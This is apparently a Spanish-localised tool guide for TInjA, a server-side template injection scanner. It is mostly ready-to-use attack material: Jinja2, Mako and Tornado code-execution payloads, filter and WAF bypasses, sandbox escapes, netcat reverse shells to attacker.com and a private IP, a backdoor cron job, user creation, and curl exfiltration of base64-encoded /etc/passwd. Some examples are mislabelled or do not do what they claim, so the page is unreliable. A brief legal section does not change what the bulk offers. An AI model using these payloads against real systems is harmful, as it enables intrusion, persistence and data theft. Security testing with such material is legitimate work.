TInjA
Overview
Sección titulada «Overview»TInjA (Template Injection Analyzer) is a specialized tool for identifying and exploiting Server-Side Template Injection (SSTI) vulnerabilities in web applications. It tests various template engines including Jinja2, Mako, Tornado, Genshi, Cheetah, and Twig by injecting payloads and analyzing responses to determine template engine type and exploit paths.
SSTI vulnerabilities allow attackers to inject template syntax into server-side template processors, potentially leading to arbitrary code execution, information disclosure, and complete system compromise.
Installation
Sección titulada «Installation»From Kali Linux Repository
Sección titulada «From Kali Linux Repository»sudo apt-get update
sudo apt-get install tinjaFrom Source
Sección titulada «From Source»git clone https://github.com/Hackmanit/TInjA.git
cd TInjA
python3 -m pip install -r requirements.txtdocker run -it kalilinux/kali-rolling tinja --helpPython Package
Sección titulada «Python Package»pip3 install tinjaBasic Usage
Sección titulada «Basic Usage»| Command | Purpose |
|---|---|
tinja -url URL | Test single URL for SSTI |
tinja -u URL -p PARAM | Test specific parameter |
tinja -l FILE | Test URLs from file list |
tinja -o OUTPUT | Save results to file |
tinja --engine ENGINE | Target specific template engine |
tinja --exploit | Generate exploitation payload |
Command Options
Sección titulada «Command Options»Target Specification
Sección titulada «Target Specification»# Single URL testing
tinja -url "http://target.com/page?name=test"
# Specific parameter
tinja -url "http://target.com/page?name=test" -p name
# Custom HTTP method
tinja -url "http://target.com/api" --method POST
# POST data testing
tinja -url "http://target.com/form" --data "user=test&message=test"Advanced Options
Sección titulada «Advanced Options»# Custom headers
tinja -url "http://target.com" -H "Authorization: Bearer token"
# Proxy configuration
tinja -url "http://target.com" --proxy "http://127.0.0.1:8080"
# SSL verification disable
tinja -url "https://target.com" --insecure
# Custom timeout
tinja -url "http://target.com" --timeout 30Template Engine Detection
Sección titulada «Template Engine Detection»Detection Methods
Sección titulada «Detection Methods»# Automatic engine detection
tinja -url "http://target.com/page?user=test"
# Output shows detected engine
# [+] Detected Template Engine: Jinja2
# [+] Vulnerability Type: SSTI| Template Engine | Common Parameters | File Location |
|---|---|---|
| Jinja2 | name, user, search, message | Flask, Django |
| Mako | template, view, page | Pyramid, Turbogears |
| Tornado | item, id, message | Tornado framework |
| Genshi | template, data, content | TurboGears |
| Cheetah | query, template, content | Older Python apps |
| Twig | data, template, page | PHP applications |
| Freemarker | object, model, data | Java applications |
Manual Engine Identification
Sección titulada «Manual Engine Identification»# Test Jinja2-specific syntax
curl "http://target.com/page?user={{7*7}}"
# Jinja2 returns: 49
# Test Mako-specific syntax
curl "http://target.com/page?user=${7*7}"
# Mako returns: 49
# Test ERB (Ruby) syntax
curl "http://target.com/page?user=<%=7*7%>"
# ERB returns: 49SSTI Payload Testing
Sección titulada «SSTI Payload Testing»Mathematical Expressions
Sección titulada «Mathematical Expressions»# Basic arithmetic test
tinja -url "http://target.com/page?name={{7*7}}"
# Boolean logic test
tinja -url "http://target.com/page?name={{1==1}}"
# String concatenation test
tinja -url "http://target.com/page?name={{'hello'+'world'}}"Blind SSTI Detection
Sección titulada «Blind SSTI Detection»# Time-based blind SSTI
tinja -url "http://target.com/page?name={{range(1000000)}}" --method GET
# String comparison blind test
tinja -url "http://target.com/page?name={%if 1==1%}A{%endif%}B"
# Output should show difference indicating template processingFilter Bypass Techniques
Sección titulada «Filter Bypass Techniques»# Underscore bypass
{{request.__class__}}
# Bracket notation bypass
{{self[request.args.key]}}
# Concatenation bypass
{{"__cl"+"ass__"}}
# Unicode bypass
{{"__class__"}}
# Hex bypass
{{"\x5f\x5fclass\x5f\x5f"}}Code Execution Payloads
Sección titulada «Code Execution Payloads»Jinja2 Exploitation
Sección titulada «Jinja2 Exploitation»# Access object attributes
{{config}}
# File reading
{{config.__class__.__init__.__globals__['os'].popen('id').read()}}
# Command execution
{{cycler.__init__.__globals__['os'].popen('whoami').read()}}
# Alternative RCE
{{''.join(request.args.get('cmd')|list)}}
# Reverse shell
tinja -url "http://target.com/page?cmd=nc -e /bin/sh attacker.com 4444"Mako Exploitation
Sección titulada «Mako Exploitation»# Expression injection
${os.popen('id').read()}
# Python code execution
<%
import os
os.system('whoami')
%>
# File access
${open('/etc/passwd').read()}Tornado Exploitation
Sección titulada «Tornado Exploitation»# Basic RCE
{%set cmd='id'%}{%set result=os.popen(cmd).read()%}
# Module import
{%import os%}${os.popen('whoami').read()}Information Gathering
Sección titulada «Information Gathering»Extract Configuration Data
Sección titulada «Extract Configuration Data»# Get config variables
tinja -url "http://target.com/page?name={{config}}" --exploit
# Access environment
tinja -url "http://target.com/page?name={{environ}}" --exploit
# List available globals
tinja -url "http://target.com/page?name={{globals()}}"File Reading
Sección titulada «File Reading»# Read /etc/passwd
tinja -url "http://target.com/page?name={{open('/etc/passwd').read()}}"
# Read application files
tinja -url "http://target.com/page?name={{open('../../config.py').read()}}"
# Read environment files
tinja -url "http://target.com/page?name={{open('.env').read()}}"Source Code Disclosure
Sección titulada «Source Code Disclosure»# Read template source
tinja -url "http://target.com/page?name={{self.module.__loader__.get_source(None, 'app')}}"
# Read Python files
tinja -url "http://target.com/page?name={{open('../app.py').read()}}"Exploitation Workflow
Sección titulada «Exploitation Workflow»Step-by-Step Exploitation
Sección titulada «Step-by-Step Exploitation»# 1. Identify vulnerability
tinja -url "http://target.com/page?user=test"
# 2. Detect template engine
# Output indicates Jinja2
# 3. Test basic payload
curl "http://target.com/page?user={{7*7}}"
# 4. Generate RCE payload
tinja -url "http://target.com/page?user=PAYLOAD" --exploit
# 5. Execute payload
curl "http://target.com/page?user={{cycler.__init__.__globals__['os'].popen('id').read()}}"
# 6. Establish reverse shell
curl "http://target.com/page?user={{cycler.__init__.__globals__['os'].popen('nc -e /bin/sh 192.168.1.100 4444').read()}}"Batch Testing from File
Sección titulada «Batch Testing from File»# Create URL list
cat > urls.txt << EOF
http://target.com/page?name=test
http://target.com/search?q=test
http://target.com/user?id=1
EOF
# Test all URLs
tinja -l urls.txt -o results.txt
# Review findings
cat results.txtOutput Analysis
Sección titulada «Output Analysis»Report Generation
Sección titulada «Report Generation»# Save detailed report
tinja -url "http://target.com" -o report.txt
# JSON output format
tinja -url "http://target.com" -o report.json --format json
# HTML report
tinja -url "http://target.com" -o report.html --format htmlReport Contents
Sección titulada «Report Contents»# View discovered vulnerabilities
grep -i "vulnerable\|ssti" report.txt
# Extract payload
grep -i "payload" report.txt
# List affected parameters
grep -i "parameter" report.txtAdvanced Techniques
Sección titulada «Advanced Techniques»Bypassing Input Filters
Sección titulada «Bypassing Input Filters»Bypassing Quotes
Sección titulada «Bypassing Quotes»# String comparison without quotes
{{7*7}}
# Using chr() function
{{chr(72)+chr(101)+chr(108)+chr(108)+chr(111)}}
# Using request.args
{{request.args.get('x')}}Bypassing Blacklists
Sección titulada «Bypassing Blacklists»# Case manipulation
{{request|safe}}
{{REQUEST|safe}}
# Comment injection
{{request/*bypass*/}}
# Null byte injection
{{request\x00}}
# Unicode normalization
{{request}}Concatenation Bypass
Sección titulada «Concatenation Bypass»# Escaped concatenation
{{'__cla'+'ss__'}}
# Using format
{{'{}{}'.format('__class__')}}
# Using join
{{''.join(['__','class__'])}}WAF Evasion
Sección titulada «WAF Evasion»# Obfuscate payload
{{().__class__.__bases__[0].__subclasses__()}}
# Use alternative methods
{{self.__init__.__globals__}}
# Fragment injection
{{requ
est}}
# Newline injection
{{request
.method}}Polyglot Payloads
Sección titulada «Polyglot Payloads»# Works across multiple engines
{{7*7}}${7*7}<%= 7*7 %>
# Detects engine by response
tinja -url "http://target.com/page?name={{7*7}}" --engine autoPost-Exploitation
Sección titulada «Post-Exploitation»Establish Persistence
Sección titulada «Establish Persistence»# Create backdoor
tinja -url "http://target.com/page?name=PAYLOAD" --exploit
# Add cron job
{{os.popen('echo "* * * * * nc -e /bin/sh attacker.com 4444" | crontab -').read()}}
# Create user
{{os.popen('useradd -m -s /bin/bash backdoor').read()}}Data Exfiltration
Sección titulada «Data Exfiltration»# Read sensitive files
tinja -url "http://target.com/page?name={{open('/var/www/config.php').read()}}"
# Exfiltrate to attacker server
{{os.popen('curl http://attacker.com?data=$(cat /etc/passwd|base64)').read()}}
# Encode output
{{os.popen('cat /etc/passwd | base64').read()}}Defensive Bypass
Sección titulada «Defensive Bypass»Template Sandbox Escape
Sección titulada «Template Sandbox Escape»# Access restricted globals
{{().__class__.__bases__[0].__subclasses__()}}
# Import modules in restricted environment
{{__import__('os').popen('id').read()}}
# Use __builtins__
{{__builtins__['eval']('7*7')}}Restricted Characters Bypass
Sección titulada «Restricted Characters Bypass»# Avoid brackets
{{().__class__.__bases__.__getitem__(0)}}
# Use getattr
{{getattr(request, '__class__')}}
# Use globals
{{self.__init__.__globals__['__builtins__']}}Mitigation Verification
Sección titulada «Mitigation Verification»Testing Fixes
Sección titulada «Testing Fixes»# Verify input sanitization
tinja -url "http://target.com/page?name=<test>" -v
# Check output encoding
tinja -url "http://target.com/page?name={{7*7}}" -v
# Validate filter implementation
tinja -url "http://target.com/page?name={{__import__}}"Common Parameters to Test
Sección titulada «Common Parameters to Test»# URL parameters
?name=test
?user=test
?search=test
?q=test
?id=1
?page=test
# POST fields
username=test
email=test
message=test
title=test
content=test
description=test
# Headers
User-Agent: test
Referer: test
X-Custom-Header: testAutomation Scripts
Sección titulada «Automation Scripts»Continuous Testing
Sección titulada «Continuous Testing»#!/bin/bash
# tinja-scan.sh - Automated SSTI scanning
while read url; do
echo "[*] Testing: $url"
tinja -url "$url" -o "results_$(date +%s).txt"
done < urls.txtIntegration with Burp Suite
Sección titulada «Integration with Burp Suite»# Export Burp requests
# Use Burp to intercept requests
# Convert to tinja format for automated testing
tinja -l burp_export.txt -o burp_results.txtTroubleshooting
Sección titulada «Troubleshooting»Common Issues
Sección titulada «Common Issues»| Issue | Solution |
|---|---|
| No detection on known vulnerable app | Try different parameters, adjust timeout |
| False positives | Verify manually with browser, increase precision |
| Connection timeout | Adjust timeout value, check proxy settings |
| SSL errors | Use --insecure flag for self-signed certs |
| No output | Check URL format, verify target is running |
Debug Mode
Sección titulada «Debug Mode»# Verbose output
tinja -url "http://target.com" -v
# Show all requests
tinja -url "http://target.com" --debug
# Save traffic log
tinja -url "http://target.com" --log traffic.logLegal and Ethical Considerations
Sección titulada «Legal and Ethical Considerations»- Authorization Required: Only test systems you own or have explicit written permission to test
- Responsible Disclosure: Report findings to vendor/organization before public disclosure
- Compliance: Follow OWASP testing guidelines and legal requirements
- Documentation: Maintain detailed records of all testing activities
- Scope Limitation: Stay within defined testing scope and parameters
Resources
Sección titulada «Resources»- OWASP SSTI: https://owasp.org/www-community/Server-Side_Template_Injection
- HackTricks SSTI: https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection
- PayloadsAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection
- TInjA GitHub: https://github.com/Hackmanit/TInjA
TInjA is essential for comprehensive web application security assessments, helping identify template injection vulnerabilities that can lead to complete system compromise.